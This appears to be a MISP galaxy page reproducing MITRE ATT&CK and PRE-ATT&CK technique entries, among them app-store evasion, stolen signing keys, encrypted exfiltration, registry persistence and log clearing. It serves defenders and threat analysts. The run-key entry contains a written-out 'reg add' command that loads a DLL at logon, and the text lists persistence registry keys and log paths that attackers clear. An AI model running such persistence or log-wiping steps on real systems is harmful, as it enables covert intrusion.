
Attack Pattern

Authors and/or Contributors: MITRE

Test ability to evade automated mobile application security analysis performed by app stores - T1393

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)

Internal MISP references

UUID c9e85b80-39e8-42df-b275-86a2afcea9e8 which can be used as unique global reference for Test ability to evade automated mobile application security analysis performed by app stores - T1393 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1393
kill_chain ['pre-attack:test-capabilities']

Choose pre-compromised mobile app developer account credentials or signing keys - T1391

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer's identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)

Internal MISP references

UUID 7a265bf0-6acc-4f43-8b22-2e58b443e62e which can be used as unique global reference for Choose pre-compromised mobile app developer account credentials or signing keys - T1391 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1391
kill_chain ['pre-attack:persona-development']

Enumerate externally facing software applications technologies, languages, and dependencies - T1261

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)

Internal MISP references

UUID ef6197fd-a58a-4006-bfd6-1d7765d8409d which can be used as unique global reference for Enumerate externally facing software applications technologies, languages, and dependencies - T1261 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1261
kill_chain ['pre-attack:technical-information-gathering']

Obtain Apple iOS enterprise distribution key pair and certificate - T1392

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)

Internal MISP references

UUID d58f3996-e293-4f69-a2c8-0e1851cb8297 which can be used as unique global reference for Obtain Apple iOS enterprise distribution key pair and certificate - T1392 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1392
kill_chain ['pre-attack:persona-development']

Analyze social and business relationships, interests, and affiliations - T1295

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Social media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)

Internal MISP references

UUID ee40d054-6e83-4302-88dc-a3af98821d8d which can be used as unique global reference for Analyze social and business relationships, interests, and affiliations - T1295 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1295
kill_chain ['pre-attack:people-weakness-identification']

Linux and Mac File and Directory Permissions Modification - T1222.002

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).

Adversaries may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.(Citation: 20 macOS Common Tools and Techniques)

Internal MISP references

UUID 09b130a2-a77e-4af0-a361-f46f9aad1345 which can be used as unique global reference for Linux and Mac File and Directory Permissions Modification - T1222.002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1222.002
kill_chain ['attack-macOS:defense-evasion', 'attack-Linux:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'File: File Metadata', 'Process: Process Creation']
mitre_platforms ['macOS', 'Linux']

Install and configure hardware, network, and systems - T1336

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)

Internal MISP references

UUID 73e394e5-3d8a-40d1-ab8c-a1b4ea9db424 which can be used as unique global reference for Install and configure hardware, network, and systems - T1336 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1336
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Compromise 3rd party or closed-source vulnerability/exploit information - T1354

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)

Internal MISP references

UUID 5a68c603-d7f9-4535-927e-ab56819eaa85 which can be used as unique global reference for Compromise 3rd party or closed-source vulnerability/exploit information - T1354 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1354
kill_chain ['pre-attack:build-capabilities']

Discover new exploits and monitor exploit-provider forums - T1350

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)

Internal MISP references

UUID 82bbd209-f516-45e0-9542-4ffbbc2a8717 which can be used as unique global reference for Discover new exploits and monitor exploit-provider forums - T1350 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1350
kill_chain ['pre-attack:build-capabilities']

Acquire and/or use 3rd party software services - T1330

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of 3rd party software services are available (e.g., Twitter, Dropbox, GoogleDocs). Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)

Internal MISP references

UUID 488da8ed-2887-4ef6-a39a-5b69bc6682c6 which can be used as unique global reference for Acquire and/or use 3rd party software services - T1330 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1330
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Acquire and/or use 3rd party infrastructure services - T1307

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally, botnets are available for rent or purchase. Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)

Internal MISP references

UUID 286cc500-4291-45c2-99a1-e760db176402 which can be used as unique global reference for Acquire and/or use 3rd party infrastructure services - T1307 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1307
kill_chain ['pre-attack:adversary-opsec']

Acquire and/or use 3rd party software services - T1308

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of 3rd party software services are available (e.g., Twitter, Dropbox, GoogleDocs). Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)

Internal MISP references

UUID 1a295f87-af63-4d94-b130-039d6221fb11 which can be used as unique global reference for Acquire and/or use 3rd party software services - T1308 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1308
kill_chain ['pre-attack:adversary-opsec']

Test signature detection for file upload/email filters - T1361

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)

Internal MISP references

UUID c9ac5715-ee5c-4380-baf4-6f12e304ca93 which can be used as unique global reference for Test signature detection for file upload/email filters - T1361 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1361
kill_chain ['pre-attack:test-capabilities']

Acquire and/or use 3rd party infrastructure services - T1329

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally, botnets are available for rent or purchase. Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)

Internal MISP references

UUID 795c1a92-3a26-453e-b99a-6a566aa94dc6 which can be used as unique global reference for Acquire and/or use 3rd party infrastructure services - T1329 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1329
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Acquire or compromise 3rd party signing certificates - T1310

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)

Internal MISP references

UUID e5164428-03ca-4336-a9a7-4d9ea1417e59 which can be used as unique global reference for Acquire or compromise 3rd party signing certificates - T1310 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1310
kill_chain ['pre-attack:adversary-opsec']

Compromise 3rd party infrastructure to support delivery - T1312

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

Internal MISP references

UUID 4900fabf-1142-4c1f-92f5-0b590e049077 which can be used as unique global reference for Compromise 3rd party infrastructure to support delivery - T1312 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1312
kill_chain ['pre-attack:adversary-opsec']

Acquire or compromise 3rd party signing certificates - T1332

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)

Internal MISP references

UUID 03f4a766-7a21-4b5e-9ccf-e0cf422ab983 which can be used as unique global reference for Acquire or compromise 3rd party signing certificates - T1332 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1332
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Compromise 3rd party infrastructure to support delivery - T1334

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

Internal MISP references

UUID e51398e6-53dc-4e9f-a323-e54683d8672b which can be used as unique global reference for Compromise 3rd party infrastructure to support delivery - T1334 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1334
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Human performs requested action of physical nature - T1385

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)

Internal MISP references

UUID fb39384c-00e4-414a-88af-e80c4904e0b8 which can be used as unique global reference for Human performs requested action of physical nature - T1385 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1385
kill_chain ['pre-attack:compromise']

Abuse of iOS Enterprise App Signing Key - T1445

An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple's App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).

Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple's App Store.

Platforms: iOS

Internal MISP references

UUID 51aedbd6-2837-4d15-aeb0-cb09f2bf22ac which can be used as unique global reference for Abuse of iOS Enterprise App Signing Key - T1445 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1445

Deliver Malicious App via Authorized App Store - T1475

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.

App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:

Adversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)

Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)

Adversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)

Internal MISP references

UUID d9db3d46-66ca-44b4-9daa-1ef97cb7465a which can be used as unique global reference for Deliver Malicious App via Authorized App Store - T1475 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1475
kill_chain ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access']
mitre_platforms ['Android', 'iOS']

Device Unlock Code Guessing or Brute Force - T1459

An adversary could make educated guesses of the device lock screen's PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).

Platforms: Android, iOS

Internal MISP references

UUID f296fc9c-2ff5-43ee-941e-6b49c438270a which can be used as unique global reference for Device Unlock Code Guessing or Brute Force - T1459 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1459

Assign KITs, KIQs, and/or intelligence requirements - T1238

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)

Internal MISP references

UUID 4fad17d3-8f42-449d-ac4b-dbb4c486127d which can be used as unique global reference for Assign KITs, KIQs, and/or intelligence requirements - T1238 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1238
kill_chain ['pre-attack:priority-definition-direction']

Assess current holdings, needs, and wants - T1236

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)

Internal MISP references

UUID 8e927b19-04a6-4aaa-a42f-4f0a53411d27 which can be used as unique global reference for Assess current holdings, needs, and wants - T1236 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1236
kill_chain ['pre-attack:priority-definition-planning']

Submit KITs, KIQs, and intelligence requirements - T1237

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)

Internal MISP references

UUID 03da0598-ed46-4a73-bf43-0313b3522400 which can be used as unique global reference for Submit KITs, KIQs, and intelligence requirements - T1237 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1237
kill_chain ['pre-attack:priority-definition-direction']

Common, high volume protocols and software - T1321

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary's traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)

Internal MISP references

UUID 0c592c79-29a7-4a94-81a4-c87eae3aead6 which can be used as unique global reference for Common, high volume protocols and software - T1321 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1321
kill_chain ['pre-attack:adversary-opsec']

Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) instead of using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that are not typically encrypted (such as HTTP or FTP).

Internal MISP references

UUID 79a4052e-1a89-4b09-aea6-51f1d11fe19c which can be used as unique global reference for Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1048.001
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channel requires a private key (only in the possession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

Internal MISP references

UUID 8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5 which can be used as unique global reference for Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1048.002
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']

Non-traditional or less attributable payment options - T1316

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Using alternative payment options allows an adversary to hide their activities. Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)

Internal MISP references

UUID b79e8a3f-a109-47c2-a0e3-564955590a3d which can be used as unique global reference for Non-traditional or less attributable payment options - T1316 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1316
kill_chain ['pre-attack:adversary-opsec']

Choose pre-compromised persona and affiliated accounts - T1343

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

For attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)

Internal MISP references

UUID 9a8c47f6-ae69-4044-917d-4b1602af64d9 which can be used as unique global reference for Choose pre-compromised persona and affiliated accounts - T1343 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1343
kill_chain ['pre-attack:persona-development']

Malicious or Vulnerable Built-in Device Functionality - T1473

The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.

Platforms: Android, iOS

Internal MISP references

UUID f9e4f526-ac9d-4df5-8949-833a82a1d2df which can be used as unique global reference for Malicious or Vulnerable Built-in Device Functionality - T1473 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1473
Related clusters

Identify vulnerabilities in third-party software libraries - T1389

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Many applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)

Internal MISP references

UUID ad124f84-52d2-40e3-95dd-cfdd44eae6ef which can be used as unique global reference for Identify vulnerabilities in third-party software libraries - T1389 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1389
kill_chain ['pre-attack:technical-weakness-identification']

Registry Run Keys / Startup Folder - T1547.001

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

The following run keys are created by default on Windows systems:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.

The following Registry keys can be used to set startup folder items for persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run automatically for the currently logged-on user.

By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Internal MISP references

UUID 9efb1ea7-c37b-4595-9640-b7680cd84279 which can be used as unique global reference for Registry Run Keys / Startup Folder - T1547.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1547.001
kill_chain ['attack-Windows:persistence', 'attack-Windows:privilege-escalation']
mitre_data_sources ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows']
Related clusters

Clear Linux or Mac System Logs - T1070.002

Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)

  • /var/log/messages: General and system-related messages
  • /var/log/secure or /var/log/auth.log: Authentication logs
  • /var/log/utmp or /var/log/wtmp: Login records
  • /var/log/kern.log: Kernel logs
  • /var/log/cron.log: Crond logs
  • /var/log/maillog: Mail server logs
  • /var/log/httpd/: Web server access and error logs

Internal MISP references

UUID 2bce5b30-7014-4a5d-ade7-12913fe6ac36 which can be used as unique global reference for Clear Linux or Mac System Logs - T1070.002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1070.002
kill_chain ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'File: File Deletion', 'File: File Modification']
mitre_platforms ['Linux', 'macOS']
Related clusters

Clear Network Connection History and Configurations - T1070.007

Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as Remote Services or External Remote Services. Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.

Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):

  • HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
  • HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers

Windows may also store information about recent RDP connections in files such as C:\Users\%username%\Documents\Default.rdp and C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in /Library/Logs and/or /var/log/).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)

Malicious network connections may also require changes to third-party applications or network configuration settings, such as Disable or Modify System Firewall or tampering to enable Proxy. Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.

Internal MISP references

UUID 3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc which can be used as unique global reference for Clear Network Connection History and Configurations - T1070.007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1070.007
kill_chain ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Network:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'File: File Modification', 'Firewall: Firewall Rule Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Linux', 'macOS', 'Windows', 'Network']
Related clusters

Compromise Software Dependencies and Development Tools - T1195.001

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)

